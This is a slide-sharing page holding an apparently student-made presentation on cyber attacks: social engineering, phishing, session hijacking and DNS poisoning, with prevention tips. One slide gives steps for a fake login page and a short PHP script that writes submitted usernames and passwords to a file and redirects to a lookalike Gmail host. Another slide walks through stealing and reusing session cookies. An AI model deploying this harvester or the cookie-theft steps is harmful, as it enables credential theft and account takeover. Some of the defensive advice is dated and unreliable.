Operation Blue Star - Saka Neela Tara
Operation Blue Star   -  Saka Neela TaraOperation Blue Star   -  Saka Neela Tara
Operation Blue Star - Saka Neela Tara
 
Palestine last event orientationfvgnh .pptx
Palestine last event orientationfvgnh .pptxPalestine last event orientationfvgnh .pptx
Palestine last event orientationfvgnh .pptx
 
Instructions for Submissions thorugh G- Classroom.pptx
Instructions for Submissions thorugh G- Classroom.pptxInstructions for Submissions thorugh G- Classroom.pptx
Instructions for Submissions thorugh G- Classroom.pptx
 
CLASS 11 CBSE B.St Project AIDS TO TRADE - INSURANCE
CLASS 11 CBSE B.St Project AIDS TO TRADE - INSURANCECLASS 11 CBSE B.St Project AIDS TO TRADE - INSURANCE
CLASS 11 CBSE B.St Project AIDS TO TRADE - INSURANCE
 
Chapter 3 - Islamic Banking Products and Services.pptx
Chapter 3 - Islamic Banking Products and Services.pptxChapter 3 - Islamic Banking Products and Services.pptx
Chapter 3 - Islamic Banking Products and Services.pptx
 
The Challenger.pdf DNHS Official Publication
The Challenger.pdf DNHS Official PublicationThe Challenger.pdf DNHS Official Publication
The Challenger.pdf DNHS Official Publication
 
"Protectable subject matters, Protection in biotechnology, Protection of othe...
"Protectable subject matters, Protection in biotechnology, Protection of othe..."Protectable subject matters, Protection in biotechnology, Protection of othe...
"Protectable subject matters, Protection in biotechnology, Protection of othe...
 
Thesis Statement for students diagnonsed withADHD.ppt
Thesis Statement for students diagnonsed withADHD.pptThesis Statement for students diagnonsed withADHD.ppt
Thesis Statement for students diagnonsed withADHD.ppt
 
BÀI TẬP BỔ TRỢ TIẾNG ANH GLOBAL SUCCESS LỚP 3 - CẢ NĂM (CÓ FILE NGHE VÀ ĐÁP Á...
BÀI TẬP BỔ TRỢ TIẾNG ANH GLOBAL SUCCESS LỚP 3 - CẢ NĂM (CÓ FILE NGHE VÀ ĐÁP Á...BÀI TẬP BỔ TRỢ TIẾNG ANH GLOBAL SUCCESS LỚP 3 - CẢ NĂM (CÓ FILE NGHE VÀ ĐÁP Á...
BÀI TẬP BỔ TRỢ TIẾNG ANH GLOBAL SUCCESS LỚP 3 - CẢ NĂM (CÓ FILE NGHE VÀ ĐÁP Á...
 
The French Revolution Class 9 Study Material pdf free download
The French Revolution Class 9 Study Material pdf free downloadThe French Revolution Class 9 Study Material pdf free download
The French Revolution Class 9 Study Material pdf free download
 
Acetabularia Information For Class 9 .docx
Acetabularia Information For Class 9  .docxAcetabularia Information For Class 9  .docx
Acetabularia Information For Class 9 .docx
 
Synthetic Fiber Construction in lab .pptx
Synthetic Fiber Construction in lab .pptxSynthetic Fiber Construction in lab .pptx
Synthetic Fiber Construction in lab .pptx
 
Welcome to TechSoup New Member Orientation and Q&A (May 2024).pdf
Welcome to TechSoup   New Member Orientation and Q&A (May 2024).pdfWelcome to TechSoup   New Member Orientation and Q&A (May 2024).pdf
Welcome to TechSoup New Member Orientation and Q&A (May 2024).pdf
 
A Strategic Approach: GenAI in Education
A Strategic Approach: GenAI in EducationA Strategic Approach: GenAI in Education
A Strategic Approach: GenAI in Education
 
Guidance_and_Counselling.pdf B.Ed. 4th Semester
Guidance_and_Counselling.pdf B.Ed. 4th SemesterGuidance_and_Counselling.pdf B.Ed. 4th Semester
Guidance_and_Counselling.pdf B.Ed. 4th Semester
 
Mule 4.6 & Java 17 Upgrade | MuleSoft Mysore Meetup #46
Mule 4.6 & Java 17 Upgrade | MuleSoft Mysore Meetup #46Mule 4.6 & Java 17 Upgrade | MuleSoft Mysore Meetup #46
Mule 4.6 & Java 17 Upgrade | MuleSoft Mysore Meetup #46
 

Attacks on the cyber world

  • 1. ATTACKS ON THE CYBER WORLD BY: NIKHIL TRIPATHI(12MCMB10) TARUN MEHROTRA(12MCMB11) SUDHIR KUMAR PANDEY(12MCMB14 )
  • 2. FLOW OF CONTENTS  INTRODUCTION  TYPES OF ATTACKS  SOCIAL ENGINEERING  PHISHING  SESSION HIJACKING  DNS SPOOFING  CONCLUSION  REFERENCES
  • 3. INTRODUCTION “A threat where weapons are computers- the most destructive weapon on the planet.” - Kevin Mitnick • 528.1 % is the growth rate of internet users over 2000-2011. • 85% of business and government agencies detected security breaches. • FBI estimates that the United States loses up to $10 billion a year to cyber crime. • In INDIA, 30 million people fell victim to cyber crime last year resulting in loss of Rs34,110 crore, annually. • Being INTERNET addicted, only one question should arise in our minds—
  • 4. INTRODUCTION “A threat where weapons are computers- the most destructive weapon on the planet.” - Kevin Mitnick • 528.1 % is the growth rate of internet users over 2000-2011. • 85% of business and government agencies detected security breaches. • FBI estimates that the United States loses up to $10 billion a year to cyber crime. • In INDIA, 30 million people fell victim to cyber crime last year resulting in loss of Rs34,110 crore, annually. • Being INTERNET addicted, only one question should arise in our minds— HOW MUCH WE ARE SECURE?????
  • 5. VARIOUS ATTACKS •More or less, hundreds of exploits are there which hackers practice on the individual hosts or even on the whole network. •Some of the most popular and dangerous attacks are: > SESSION HIJACKING (SNIFFING). > PHISHING. > DOS ATTACK (SMURFING). > DNS POISONING(DNS SPOOFING). > SQL INJECTION. > FAKE EMAILING AND EMAIL BOMBING. > TROJAN HORSES, KEYLOGGERS and many more….
  • 6. SOCIAL ENGINEERING •Art of manipulating people into performing actions or divulging confidential information. •An art of DECEPTION. •Varies from purely technical to purely non-technical. •Depends upon the victim’s cyber knowledge. •Depends upon till what extent attacker is spoofing its identity. •Result of human’s unawareness about the cyber crimes. •Initiation of almost all the cyber attacks practiced nowadays. •One of the most dangerous and most effective technique. •PHISHING is an example of technical social engineering.
  • 7. PHISHING •Act of attempting to acquire information such as usernames, passwords, by masquerading as a trustworthy entity in an electronic communication. •Started in late 90’s. •Named after the earlier hackers, known as phreakers… •Still, the most effective and most dangerous social-engineering attack. •Overall cost due to online fraud by phishing reached to 3 Billion $ in 2007. •In 2011, it reached the peak of 94 Billion $. •Main reason for growth in phishing scam is the users’ unawareness.
  • 9. HOW IT WORKS? Components of Phishing are:- •A fake page •A PHP script to redirect user to the original page containing some notifications •The redirected original page along with some notification •The generated text file having username and password
  • 11.
  • 12. Working(contd.) •Change the redirected url to the url of PHP file and make sure that both the fake page and PHP script is present within the same directory. •Change the method from POST to GET. •PHP code:- <?php header("Location: http://gmaiil.t35.com/ServiceLoginAuth.htm"); $handle = fopen("passwords.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "rn"); } fwrite($handle, "rn"); fclose($handle); exit; ?>
  • 13.
  • 14.
  • 15. HOW TO PREVENT PHISHING? 1. The most basic thing is to see the lock beside the url field of the browser. 2. Check the url. 3. Check the certificate allotted to the company by the authorized party. E.g. Thawte Consulting in case of Google. 4. If possible, enter the IP address for the gmail.com instead of the domain name. Its time taking but far secure for phishing and DNS poisoning to happen. But what if it is combined with other attacks?
  • 16. SESSION HIJACKING •Used to refer to the theft of a magic cookie responsible to authenticate a user to a remote server. •Some basic methods to implement the attack: Session fixation, Cross-site scripting and the most popular one- Session sidejacking . •Started in 2004 and gained popularity among the hackers like a wildfire. •American National agencies faced million dollars losses due to this attack. •Falls into the category of the deadliest attacks due to occurrences of huge losses. •Can be implemented by first capturing the packets and then analyzing it. •Cain & Abel is popular for capturing and APR and Wireshark/Ettercap is popular for analyzing the packets.
  • 17. HOW IT WORKS? 1. Applicable only if using LANs for accessing the internet. 2. Victim access the internet by accessing the default gateway. 3. Attacker sitting in the same network captures the packet going from victim’s machine to the default gateway and vice-versa. 4. Now, after capturing, attacker analyze the packets and read the cookies. 5. Next, attacker copies those cookies and set it into his/her browser. 6. That’s it. Now, he’ll get access to user’s account.
  • 20.
  • 21.
  • 22.
  • 23.
  • 24. HOW TO PREVENT SESSION HIJACKING? 1. If possible, never use any shared network to access your accounts. 2. Otherwise, log out after every few seconds, but it seems impossible. 3. The best way is that web servers should use time stamped cookies but it is still in somewhat, testing phase. 4. Otherwise, use HTTPs to encrypt the traffic. But what if attacker intentionally downgrades your HTTPs connection to HTTP!!!
  • 25. DNS POISONING • An attack where victim’s machine gets fooled and redirected to some other server rather than the desired server. •Also called DNS spoofing. •Attacker poisons the DNS cache entry so it starts giving false results. •Cain & Abel can be used for this purpose by using MAN-IN-THE-MIDDLE attack. •Being an insecure protocol, any host can resolve the query generated by a user.
  • 27. HOW TO PREVENT DNS POISONING? •The only way to prevent DNS poisoning is by making this protocol a secure one. Research is still going on in this field under the brolly of Verisign Inc. •The new protocol will be named as DNSSEC(Domain Name System Security Extension). •http://verisigninc.com is the only domain yet which we found as DNSSEC enabled. •DNSSEC-enabled packets are larger (> 512 bytes) than traditional DNS packets. •DNSSEC will generate more TCP traffic. •DNSSEC requires support for EDNS0. •Thus, a huge change will be required before DNSSEC implementation.
  • 28. CONCLUSION •Many attacks are being practiced on the internet all round the globe. •Along with these attacks, some mechanisms are there to be secure from these attacks. •But these mechanisms are not enough to secure us from all the possibilities. •The day is not away from us when the two important components of Internet will be DNSSEC and IPv6 rather than DNS and IPv4. At that time ,may be, we can say that internet is now secure. •But what to do untill that day? How to be completely secure in this cyber world?? •Till then, the only answer which one can think of is---
  • 29. CONCLUSION •Many attacks are being practiced on the internet all round the globe. •Along with these attacks, some mechanisms are there to be secure from these attacks. •But these mechanisms are not enough to secure us from all the possibilities. •The day is not away from us when the two important components of Internet will be DNSSEC and IPv6 rather than DNS and IPv4. At that time ,may be, we can say that internet is now secure. •But what to do untill that day? How to be completely secure in this cyber world?? •Till then, the only answer which one can think of is--- STAY AWAY FROM INTERNET!!! Its not the proper answer, but at least, its true….